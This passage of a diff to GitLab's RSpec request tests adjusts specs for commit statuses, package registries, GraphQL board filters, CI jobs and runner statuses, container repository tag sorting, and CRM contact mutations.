+ end + end + + let!(:develop) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'develop', protected: false).tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end context "reporter user" do let(:statuses_id) { json_response.map { |status| status['id'] } } @@ -131,7 +142,7 @@ RSpec.describe API::CommitStatuses do %w[pending running success failed canceled].each do |status| context "for #{status}" do context 'when pipeline for sha does not exists' do - it 'creates commit status' do + it 'creates commit status and sets pipeline iid' do post api(post_url, developer), params: { state: status } expect(response).to have_gitlab_http_status(:created) @@ -145,6 +156,8 @@ RSpec.describe API::CommitStatuses do if status == 'failed' expect(CommitStatus.find(json_response['id'])).to be_api_failure end + + expect(::Ci::Pipeline.last.iid).not_to be_nil end end end @@ -308,8 +321,19 @@ RSpec.describe API::CommitStatuses do end context 'when a pipeline id is specified' do - let!(:first_pipeline) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', status: 'created') } - let!(:other_pipeline) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', status: 'created') } + let!(:first_pipeline) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', status: 'created').tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end + + let!(:other_pipeline) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', status: 'created').tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! 
+ end + end subject do post api(post_url, developer), params: { diff --git a/spec/requests/api/commits_spec.rb b/spec/requests/api/commits_spec.rb index 1d76c281dee..1e587480fd9 100644 --- a/spec/requests/api/commits_spec.rb +++ b/spec/requests/api/commits_spec.rb @@ -377,11 +377,11 @@ RSpec.describe API::Commits do end context 'when using warden' do - it 'increments usage counters', :clean_gitlab_redis_shared_state do + it 'increments usage counters', :clean_gitlab_redis_sessions do session_id = Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') session_hash = { 'warden.user.user.key' => [[user.id], user.encrypted_password[0, 29]] } - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end diff --git a/spec/requests/api/composer_packages_spec.rb b/spec/requests/api/composer_packages_spec.rb index e75725cacba..21b4634ce25 100644 --- a/spec/requests/api/composer_packages_spec.rb +++ b/spec/requests/api/composer_packages_spec.rb @@ -9,6 +9,10 @@ RSpec.describe API::ComposerPackages do let_it_be(:personal_access_token) { create(:personal_access_token, user: user) } let_it_be(:package_name) { 'package-name' } let_it_be(:project, reload: true) { create(:project, :custom_repo, files: { 'composer.json' => { name: package_name }.to_json }, group: group) } + let_it_be(:deploy_token_for_project) { create(:deploy_token, read_package_registry: true, write_package_registry: true) } + let_it_be(:project_deploy_token) { create(:project_deploy_token, deploy_token: deploy_token_for_project, project: project) } + let_it_be(:deploy_token_for_group) { create(:deploy_token, :group, read_package_registry: true, write_package_registry: true) } + let_it_be(:group_deploy_token) { create(:group_deploy_token, deploy_token: deploy_token_for_group, group: group) } let(:snowplow_gitlab_standard_context) { { project: project, namespace: project.namespace, user: user } } 
let(:headers) { {} } @@ -92,6 +96,8 @@ RSpec.describe API::ComposerPackages do group.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) end + it_behaves_like 'Composer access with deploy tokens' + context 'with access to the api' do where(:project_visibility_level, :user_role, :member, :user_token, :include_package) do 'PRIVATE' | :developer | true | true | :include_package @@ -162,6 +168,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -219,6 +227,8 @@ RSpec.describe API::ComposerPackages do end end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -265,6 +275,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -308,6 +320,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer publish with deploy tokens' end it_behaves_like 'rejects Composer access with unknown project id' diff --git a/spec/requests/api/conan_project_packages_spec.rb b/spec/requests/api/conan_project_packages_spec.rb index da054ed2e96..c108f2efaaf 100644 --- a/spec/requests/api/conan_project_packages_spec.rb +++ b/spec/requests/api/conan_project_packages_spec.rb @@ -1,10 +1,11 @@ # frozen_string_literal: true require 'spec_helper' -RSpec.describe API::ConanProjectPackages, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/326194' do +RSpec.describe API::ConanProjectPackages do include_context 
'conan api setup' let(:project_id) { project.id } + let(:snowplow_standard_context_params) { { user: user, project: project, namespace: project.namespace } } describe 'GET /api/v4/projects/:id/packages/conan/v1/ping' do let(:url) { "/projects/#{project.id}/packages/conan/v1/ping" } @@ -92,7 +93,7 @@ RSpec.describe API::ConanProjectPackages, quarantine: 'https://gitlab.com/gitlab end end - context 'file download endpoints' do + context 'file download endpoints', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/326194' do include_context 'conan file download endpoints' describe 'GET /api/v4/projects/:id/packages/conan/v1/files/:package_name/package_version/:package_username/:package_channel/ diff --git a/spec/requests/api/dependency_proxy_spec.rb b/spec/requests/api/dependency_proxy_spec.rb index 2837d1c02c4..067852ef1e9 100644 --- a/spec/requests/api/dependency_proxy_spec.rb +++ b/spec/requests/api/dependency_proxy_spec.rb @@ -3,8 +3,6 @@ require 'spec_helper' RSpec.describe API::DependencyProxy, api: true do - include ExclusiveLeaseHelpers - let_it_be(:user) { create(:user) } let_it_be(:blob) { create(:dependency_proxy_blob )} let_it_be(:group, reload: true) { blob.group } @@ -20,11 +18,8 @@ RSpec.describe API::DependencyProxy, api: true do shared_examples 'responding to purge requests' do context 'with feature available and enabled' do - let_it_be(:lease_key) { "dependency_proxy:delete_group_blobs:#{group.id}" } - context 'an admin user' do it 'deletes the blobs and returns no content' do - stub_exclusive_lease(lease_key, timeout: 1.hour) expect(PurgeDependencyProxyCacheWorker).to receive(:perform_async) subject @@ -32,23 +27,6 @@ RSpec.describe API::DependencyProxy, api: true do expect(response).to have_gitlab_http_status(:accepted) expect(response.body).to eq('202') end - - context 'called multiple times in one hour', :clean_gitlab_redis_shared_state do - it 'returns 409 with an error message' do - stub_exclusive_lease_taken(lease_key, timeout: 1.hour) 
- - subject - - expect(response).to have_gitlab_http_status(:conflict) - expect(response.body).to include('This request has already been made.') - end - - it 'executes service only for the first time' do - expect(PurgeDependencyProxyCacheWorker).to receive(:perform_async).once - - 2.times { subject } - end - end end context 'a non-admin' do diff --git a/spec/requests/api/error_tracking/collector_spec.rb b/spec/requests/api/error_tracking/collector_spec.rb index 21e2849fef0..573da862b57 100644 --- a/spec/requests/api/error_tracking/collector_spec.rb +++ b/spec/requests/api/error_tracking/collector_spec.rb @@ -24,7 +24,7 @@ RSpec.describe API::ErrorTracking::Collector do end RSpec.shared_examples 'successful request' do - it 'writes to the database and returns OK' do + it 'writes to the database and returns OK', :aggregate_failures do expect { subject }.to change { ErrorTracking::ErrorEvent.count }.by(1) expect(response).to have_gitlab_http_status(:ok) @@ -40,6 +40,8 @@ RSpec.describe API::ErrorTracking::Collector do subject { post api(url), params: params, headers: headers } + it_behaves_like 'successful request' + context 'error tracking feature is disabled' do before do setting.update!(enabled: false) @@ -109,8 +111,6 @@ RSpec.describe API::ErrorTracking::Collector do it_behaves_like 'successful request' end - - it_behaves_like 'successful request' end describe "POST /error_tracking/collector/api/:id/store" do @@ -165,6 +165,12 @@ RSpec.describe API::ErrorTracking::Collector do it_behaves_like 'successful request' end + context 'body contains nullbytes' do + let_it_be(:raw_event) { fixture_file('error_tracking/parsed_event_nullbytes.json') } + + it_behaves_like 'successful request' + end + context 'sentry_key as param and empty headers' do let(:url) { "/error_tracking/collector/api/#{project.id}/store?sentry_key=#{sentry_key}" } let(:headers) { {} } diff --git a/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb 
b/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb index 241c658441b..6324db0be4a 100644 --- a/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb @@ -16,6 +16,7 @@ RSpec.describe 'get board lists' do let(:params) { '' } let(:board) { } + let(:confidential) { false } let(:board_parent_type) { board_parent.class.to_s.downcase } let(:board_data) { graphql_data[board_parent_type]['boards']['nodes'][0] } let(:lists_data) { board_data['lists']['nodes'][0] } @@ -30,7 +31,7 @@ RSpec.describe 'get board lists' do nodes { lists { nodes { - issues(filters: {labelName: "#{label2.title}"}, first: 3) { + issues(filters: {labelName: "#{label2.title}", confidential: #{confidential}}, first: 3) { count nodes { #{all_graphql_fields_for('issues'.classify)} @@ -57,14 +58,15 @@ RSpec.describe 'get board lists' do end shared_examples 'group and project board list issues query' do - let!(:board) { create(:board, resource_parent: board_parent) } - let!(:label_list) { create(:list, board: board, label: label, position: 10) } - let!(:issue1) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 9) } - let!(:issue2) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 2) } - let!(:issue3) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } - let!(:issue4) { create(:issue, project: issue_project, labels: [label], relative_position: 9) } - let!(:issue5) { create(:issue, project: issue_project, labels: [label2], relative_position: 432) } - let!(:issue6) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:board) { create(:board, resource_parent: board_parent) } + let_it_be(:label_list) { create(:list, board: board, label: label, position: 10) } + let_it_be(:issue1) { create(:issue, project: issue_project, labels: [label, label2], 
relative_position: 9) } + let_it_be(:issue2) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 2) } + let_it_be(:issue3) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:issue4) { create(:issue, project: issue_project, labels: [label], relative_position: 9) } + let_it_be(:issue5) { create(:issue, project: issue_project, labels: [label2], relative_position: 432) } + let_it_be(:issue6) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:issue7) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 5, confidential: true) } context 'when the user does not have access to the board' do it 'returns nil' do @@ -90,23 +92,33 @@ RSpec.describe 'get board lists' do expect(issue_id).not_to include(issue6.id) expect(issue3.relative_position).to be_nil end + + context 'when filtering by confidential' do + let(:confidential) { true } + + it 'returns matching issue' do + expect(issue_titles).to match_array([issue7.title]) + expect(issue_relative_positions).not_to include(nil) + end + end end end describe 'for a project' do - let(:board_parent) { project } - let(:label) { project_label } - let(:label2) { project_label2 } - let(:issue_project) { project } + let_it_be(:board_parent) { project } + let_it_be(:label) { project_label } + let_it_be(:label2) { project_label2 } + let_it_be(:issue_project) { project } it_behaves_like 'group and project board list issues query' end describe 'for a group' do - let(:board_parent) { group } - let(:label) { group_label } - let(:label2) { group_label2 } - let(:issue_project) { create(:project, :private, group: group) } + let_it_be(:board_parent) { group } + let_it_be(:label) { group_label } + let_it_be(:label2) { group_label2 } + + let_it_be(:issue_project) { create(:project, :private, group: group) } before do allow(board_parent).to 
receive(:multiple_issue_boards_available?).and_return(false) diff --git a/spec/requests/api/graphql/boards/board_list_query_spec.rb b/spec/requests/api/graphql/boards/board_list_query_spec.rb index dec7ca715f2..f01f7e87f10 100644 --- a/spec/requests/api/graphql/boards/board_list_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_list_query_spec.rb @@ -12,6 +12,7 @@ RSpec.describe 'Querying a Board list' do let_it_be(:list) { create(:list, board: board, label: label) } let_it_be(:issue1) { create(:issue, project: project, labels: [label]) } let_it_be(:issue2) { create(:issue, project: project, labels: [label], assignees: [current_user]) } + let_it_be(:issue3) { create(:issue, project: project, labels: [label], confidential: true) } let(:filters) { {} } let(:query) do @@ -37,19 +38,33 @@ RSpec.describe 'Querying a Board list' do it { is_expected.to include({ 'issuesCount' => 2, 'title' => list.title }) } - context 'with matching issue filters' do - let(:filters) { { assigneeUsername: current_user.username } } + describe 'issue filters' do + context 'with matching assignee username issue filters' do + let(:filters) { { assigneeUsername: current_user.username } } - it 'filters issues metadata' do - is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + end end - end - context 'with unmatching issue filters' do - let(:filters) { { assigneeUsername: 'foo' } } + context 'with unmatching assignee username issue filters' do + let(:filters) { { assigneeUsername: 'foo' } } + + it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 0, 'title' => list.title }) + end + end + + context 'when filtering by confidential' do + let(:filters) { { confidential: true } } + + before_all do + project.add_developer(current_user) + end - it 'filters issues metadata' do - is_expected.to include({ 'issuesCount' => 0, 'title' => list.title }) + 
it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + end end end end diff --git a/spec/requests/api/graphql/boards/board_lists_query_spec.rb b/spec/requests/api/graphql/boards/board_lists_query_spec.rb index ace8c59e82d..e8fb9daa43b 100644 --- a/spec/requests/api/graphql/boards/board_lists_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_lists_query_spec.rb @@ -109,9 +109,15 @@ RSpec.describe 'get board lists' do it 'returns the correct list with issue count for matching issue filters' do label_list = create(:list, board: board, label: label, position: 10) create(:issue, project: project, labels: [label, label2]) + create(:issue, project: project, labels: [label, label2], confidential: true) create(:issue, project: project, labels: [label]) - post_graphql(query(id: global_id_of(label_list), issueFilters: { labelName: label2.title }), current_user: user) + post_graphql( + query( + id: global_id_of(label_list), + issueFilters: { labelName: label2.title, confidential: false } + ), current_user: user + ) aggregate_failures do list_node = lists_data[0]['node'] diff --git a/spec/requests/api/graphql/ci/jobs_spec.rb b/spec/requests/api/graphql/ci/jobs_spec.rb index b2f4801a083..3a1df3525ef 100644 --- a/spec/requests/api/graphql/ci/jobs_spec.rb +++ b/spec/requests/api/graphql/ci/jobs_spec.rb @@ -14,8 +14,8 @@ RSpec.describe 'Query.project.pipeline' do describe '.stages.groups.jobs' do let(:pipeline) do pipeline = create(:ci_pipeline, project: project, user: user) - stage = create(:ci_stage_entity, project: project, pipeline: pipeline, name: 'first') - create(:ci_build, stage_id: stage.id, pipeline: pipeline, name: 'my test job') + stage = create(:ci_stage_entity, project: project, pipeline: pipeline, name: 'first', position: 1) + create(:ci_build, stage_id: stage.id, pipeline: pipeline, name: 'my test job', scheduling_type: :stage) pipeline end @@ -44,13 +44,23 @@ RSpec.describe 'Query.project.pipeline' do name 
jobs { nodes { - detailedStatus { - id - } name needs { nodes { #{all_graphql_fields_for('CiBuildNeed')} } } + previousStageJobsOrNeeds { + nodes { + ... on CiBuildNeed { + #{all_graphql_fields_for('CiBuildNeed')} + } + ... on CiJob { + #{all_graphql_fields_for('CiJob')} + } + } + } + detailedStatus { + id + } pipeline { id } @@ -62,58 +72,61 @@ RSpec.describe 'Query.project.pipeline' do FIELDS end - context 'when there are build needs' do - before do - pipeline.statuses.each do |build| - create_list(:ci_build_need, 2, build: build) - end - end - - it 'reports the build needs' do - post_graphql(query, current_user: user) - - expect(jobs_graphql_data).to contain_exactly a_hash_including( - 'needs' => a_hash_including( - 'nodes' => contain_exactly( - a_hash_including('name' => String), - a_hash_including('name' => String) - ) - ) - ) - end - end - it 'returns the jobs of a pipeline stage' do post_graphql(query, current_user: user) expect(jobs_graphql_data).to contain_exactly(a_hash_including('name' => 'my test job')) end - describe 'performance' do + context 'when there is more than one stage and job needs' do before do build_stage = create(:ci_stage_entity, position: 2, name: 'build', project: project, pipeline: pipeline) test_stage = create(:ci_stage_entity, position: 3, name: 'test', project: project, pipeline: pipeline) - create(:commit_status, pipeline: pipeline, stage_id: build_stage.id, name: 'docker 1 2') - create(:commit_status, pipeline: pipeline, stage_id: build_stage.id, name: 'docker 2 2') - create(:commit_status, pipeline: pipeline, stage_id: test_stage.id, name: 'rspec 1 2') - create(:commit_status, pipeline: pipeline, stage_id: test_stage.id, name: 'rspec 2 2') - end - it 'can find the first stage' do - post_graphql(query, current_user: user, variables: first_n.with(1)) + create(:ci_build, pipeline: pipeline, name: 'docker 1 2', scheduling_type: :stage, stage: build_stage, stage_idx: build_stage.position) + create(:ci_build, pipeline: pipeline, name: 
'docker 2 2', stage: build_stage, stage_idx: build_stage.position, scheduling_type: :dag) + create(:ci_build, pipeline: pipeline, name: 'rspec 1 2', scheduling_type: :stage, stage: test_stage, stage_idx: test_stage.position) + test_job = create(:ci_build, pipeline: pipeline, name: 'rspec 2 2', scheduling_type: :dag, stage: test_stage, stage_idx: test_stage.position) - expect(jobs_graphql_data).to contain_exactly(a_hash_including('name' => 'my test job')) + create(:ci_build_need, build: test_job, name: 'my test job') end - it 'reports the build needs and previous stages with no duplicates', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/346433' do + it 'reports the build needs and execution requirements', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347290' do post_graphql(query, current_user: user) expect(jobs_graphql_data).to contain_exactly( - a_hash_including('name' => 'my test job'), - a_hash_including('name' => 'docker 1 2'), - a_hash_including('name' => 'docker 2 2'), - a_hash_including('name' => 'rspec 1 2'), - a_hash_including('name' => 'rspec 2 2') + a_hash_including( + 'name' => 'my test job', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [] } + ), + a_hash_including( + 'name' => 'docker 1 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including( 'name' => 'my test job' ) + ] } + ), + a_hash_including( + 'name' => 'docker 2 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [] } + ), + a_hash_including( + 'name' => 'rspec 1 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including('name' => 'docker 1 2'), + a_hash_including('name' => 'docker 2 2') + ] } + ), + a_hash_including( + 'name' => 'rspec 2 2', + 'needs' => { 'nodes' => [a_hash_including('name' => 'my test job')] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including('name' => 'my test job' ) + ] } + ) ) end 
diff --git a/spec/requests/api/graphql/ci/pipelines_spec.rb b/spec/requests/api/graphql/ci/pipelines_spec.rb index 1f47f678898..95ddd0250e7 100644 --- a/spec/requests/api/graphql/ci/pipelines_spec.rb +++ b/spec/requests/api/graphql/ci/pipelines_spec.rb @@ -79,12 +79,13 @@ RSpec.describe 'Query.project(fullPath).pipelines' do create(:ci_build, pipeline: pipeline, stage_id: other_stage.id, name: 'linux: [baz]') end - it 'is null if the user is a guest' do + it 'is present if the user has guest access' do project.add_guest(user) - post_graphql(query, current_user: user, variables: first_n.with(1)) + post_graphql(query, current_user: user) - expect(graphql_data_at(:project, :pipelines, :nodes)).to contain_exactly a_hash_including('stages' => be_nil) + expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :name)) + .to contain_exactly(eq(stage.name), eq(other_stage.name)) end it 'is present if the user has reporter access' do @@ -113,12 +114,13 @@ RSpec.describe 'Query.project(fullPath).pipelines' do wrap_fields(query_graphql_path(query_path, :name)) end - it 'is empty if the user is a guest' do + it 'is present if the user has guest access' do project.add_guest(user) post_graphql(query, current_user: user) - expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :groups)).to be_empty + expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :groups, :nodes, :name)) + .to contain_exactly('linux', 'linux') end it 'is present if the user has reporter access' do diff --git a/spec/requests/api/graphql/ci/runner_spec.rb b/spec/requests/api/graphql/ci/runner_spec.rb index ab53ff654e9..98d3a3b1c51 100644 --- a/spec/requests/api/graphql/ci/runner_spec.rb +++ b/spec/requests/api/graphql/ci/runner_spec.rb @@ -63,7 +63,7 @@ RSpec.describe 'Query.runner(id)' do 'revision' => runner.revision, 'locked' => false, 'active' => runner.active, - 'status' => runner.status.to_s.upcase, + 'status' => runner.status('14.5').to_s.upcase, 
'maximumTimeout' => runner.maximum_timeout, 'accessLevel' => runner.access_level.to_s.upcase, 'runUntagged' => runner.run_untagged, @@ -221,6 +221,54 @@ RSpec.describe 'Query.runner(id)' do end end + describe 'for runner with status' do + let_it_be(:stale_runner) { create(:ci_runner, description: 'Stale runner 1', created_at: 3.months.ago) } + let_it_be(:never_contacted_instance_runner) { create(:ci_runner, description: 'Missing runner 1', created_at: 1.month.ago, contacted_at: nil) } + + let(:status_fragment) do + %( + status + legacyStatusWithExplicitVersion: status(legacyMode: "14.5") + newStatus: status(legacyMode: null) + ) + end + + let(:query) do + %( + query { + staleRunner: runner(id: "#{stale_runner.to_global_id}") { #{status_fragment} } + pausedRunner: runner(id: "#{inactive_instance_runner.to_global_id}") { #{status_fragment} } + neverContactedInstanceRunner: runner(id: "#{never_contacted_instance_runner.to_global_id}") { #{status_fragment} } + } + ) + end + + it 'retrieves status fields with expected values' do + post_graphql(query, current_user: user) + + stale_runner_data = graphql_data_at(:stale_runner) + expect(stale_runner_data).to match a_hash_including( + 'status' => 'NOT_CONNECTED', + 'legacyStatusWithExplicitVersion' => 'NOT_CONNECTED', + 'newStatus' => 'STALE' + ) + + paused_runner_data = graphql_data_at(:paused_runner) + expect(paused_runner_data).to match a_hash_including( + 'status' => 'PAUSED', + 'legacyStatusWithExplicitVersion' => 'PAUSED', + 'newStatus' => 'OFFLINE' + ) + + never_contacted_instance_runner_data = graphql_data_at(:never_contacted_instance_runner) + expect(never_contacted_instance_runner_data).to match a_hash_including( + 'status' => 'NOT_CONNECTED', + 'legacyStatusWithExplicitVersion' => 'NOT_CONNECTED', + 'newStatus' => 'NEVER_CONTACTED' + ) + end + end + describe 'for multiple runners' do let_it_be(:project1) { create(:project, :test_repo) } let_it_be(:project2) { create(:project, :test_repo) } diff --git 
a/spec/requests/api/graphql/ci/runners_spec.rb b/spec/requests/api/graphql/ci/runners_spec.rb index 51a07e60e15..267dd1b5e6f 100644 --- a/spec/requests/api/graphql/ci/runners_spec.rb +++ b/spec/requests/api/graphql/ci/runners_spec.rb @@ -62,6 +62,15 @@ RSpec.describe 'Query.runners' do it_behaves_like 'a working graphql query returning expected runner' end + + context 'runner_type is PROJECT_TYPE and status is NEVER_CONTACTED' do + let(:runner_type) { 'PROJECT_TYPE' } + let(:status) { 'NEVER_CONTACTED' } + + let!(:expected_runner) { project_runner } + + it_behaves_like 'a working graphql query returning expected runner' + end end describe 'pagination' do diff --git a/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb b/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb index d93afcc0f33..802ab847b3d 100644 --- a/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb +++ b/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb @@ -30,6 +30,14 @@ RSpec.describe 'container repository details' do subject { post_graphql(query, current_user: user, variables: variables) } + shared_examples 'returning an invalid value error' do + it 'returns an error' do + subject + + expect(graphql_errors.first.dig('message')).to match(/invalid value/) + end + end + it_behaves_like 'a working graphql query' do before do subject @@ -138,6 +146,80 @@ RSpec.describe 'container repository details' do end end + context 'sorting the tags' do + let(:sort) { 'NAME_DESC' } + let(:tags_response) { container_repository_details_response.dig('tags', 'edges') } + let(:variables) do + { id: container_repository_global_id, n: sort } + end + + let(:query) do + <<~GQL + query($id: ID!, $n: ContainerRepositoryTagSort) { + containerRepository(id: $id) { + tags(sort: $n) { + edges { + node { + #{all_graphql_fields_for('ContainerRepositoryTag')} + } + } + } + } + } + GQL + end + + it 
'sorts the tags', :aggregate_failures do + subject + + expect(tags_response.first.dig('node', 'name')).to eq('tag5') + expect(tags_response.last.dig('node', 'name')).to eq('latest') + end + + context 'invalid sort' do + let(:sort) { 'FOO_ASC' } + + it_behaves_like 'returning an invalid value error' + end + end + + context 'filtering by name' do + let(:name) { 'l' } + let(:tags_response) { container_repository_details_response.dig('tags', 'edges') } + let(:variables) do + { id: container_repository_global_id, n: name } + end + + let(:query) do + <<~GQL + query($id: ID!, $n: String) { + containerRepository(id: $id) { + tags(name: $n) { + edges { + node { + #{all_graphql_fields_for('ContainerRepositoryTag')} + } + } + } + } + } + GQL + end + + it 'sorts the tags', :aggregate_failures do + subject + + expect(tags_response.size).to eq(1) + expect(tags_response.first.dig('node', 'name')).to eq('latest') + end + + context 'invalid filter' do + let(:name) { 1 } + + it_behaves_like 'returning an invalid value error' + end + end + context 'with tags with a manifest containing nil fields' do let(:tags_response) { container_repository_details_response.dig('tags', 'nodes') } let(:errors) { container_repository_details_response.dig('errors') } diff --git a/spec/requests/api/graphql/current_user/todos_query_spec.rb b/spec/requests/api/graphql/current_user/todos_query_spec.rb index 981b10a7467..5a45f0db518 100644 --- a/spec/requests/api/graphql/current_user/todos_query_spec.rb +++ b/spec/requests/api/graphql/current_user/todos_query_spec.rb @@ -69,7 +69,7 @@ RSpec.describe 'Query current user todos' do QUERY end - it 'avoids N+1 queries', :request_store do + it 'avoids N+1 queries', :request_store, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/338671' do control = ActiveRecord::QueryRecorder.new { post_graphql(query, current_user: current_user) } project2 = create(:project) diff --git a/spec/requests/api/graphql/mutations/design_management/delete_spec.rb 
b/spec/requests/api/graphql/mutations/design_management/delete_spec.rb index 1dffb86b344..1f43f113e65 100644 --- a/spec/requests/api/graphql/mutations/design_management/delete_spec.rb +++ b/spec/requests/api/graphql/mutations/design_management/delete_spec.rb @@ -53,7 +53,7 @@ RSpec.describe "deleting designs" do context 'the designs list contains filenames we cannot find' do it_behaves_like 'a failed request' do - let(:designs) { %w/foo bar baz/.map { |fn| instance_double('file', filename: fn) } } + let(:designs) { %w/foo bar baz/.map { |fn| double('file', filename: fn) } } let(:the_error) { a_string_matching %r/filenames were not found/ } end end diff --git a/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb b/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb index 3da702c55d7..2da69509ad6 100644 --- a/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb +++ b/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'Setting issues crm contacts' do let(:issue) { create(:issue, project: project) } let(:operation_mode) { Types::MutationOperationModeEnum.default_mode } - let(:crm_contact_ids) { [global_id_of(contacts[1]), global_id_of(contacts[2])] } + let(:contact_ids) { [global_id_of(contacts[1]), global_id_of(contacts[2])] } let(:does_not_exist_or_no_permission) { "The resource that you are attempting to access does not exist or you don't have permission to perform this action" } let(:mutation) do @@ -20,7 +20,7 @@ RSpec.describe 'Setting issues crm contacts' do project_path: issue.project.full_path, iid: issue.iid.to_s, operation_mode: operation_mode, - crm_contact_ids: crm_contact_ids + contact_ids: contact_ids } graphql_mutation(:issue_set_crm_contacts, variables, @@ -83,7 +83,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'append' do - let(:crm_contact_ids) { [global_id_of(contacts[3])] } + let(:contact_ids) { [global_id_of(contacts[3])] } 
let(:operation_mode) { Types::MutationOperationModeEnum.enum[:append] } it 'updates the issue with correct contacts' do @@ -95,7 +95,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'remove' do - let(:crm_contact_ids) { [global_id_of(contacts[0])] } + let(:contact_ids) { [global_id_of(contacts[0])] } let(:operation_mode) { Types::MutationOperationModeEnum.enum[:remove] } it 'updates the issue with correct contacts' do @@ -107,7 +107,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'when the contact does not exist' do - let(:crm_contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } + let(:contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } it 'returns expected error' do post_graphql_mutation(mutation, current_user: user) @@ -120,7 +120,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when the contact belongs to a different group' do let(:group2) { create(:group) } let(:contact) { create(:contact, group: group2) } - let(:crm_contact_ids) { [global_id_of(contact)] } + let(:contact_ids) { [global_id_of(contact)] } before do group2.add_reporter(user) @@ -137,7 +137,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when attempting to add more than 6' do let(:operation_mode) { Types::MutationOperationModeEnum.enum[:append] } let(:gid) { global_id_of(contacts[0]) } - let(:crm_contact_ids) { [gid, gid, gid, gid, gid, gid, gid] } + let(:contact_ids) { [gid, gid, gid, gid, gid, gid, gid] } it 'returns expected error' do post_graphql_mutation(mutation, current_user: user) @@ -149,7 +149,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when trying to remove non-existent contact' do let(:operation_mode) { Types::MutationOperationModeEnum.enum[:remove] } - let(:crm_contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } + let(:contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } 
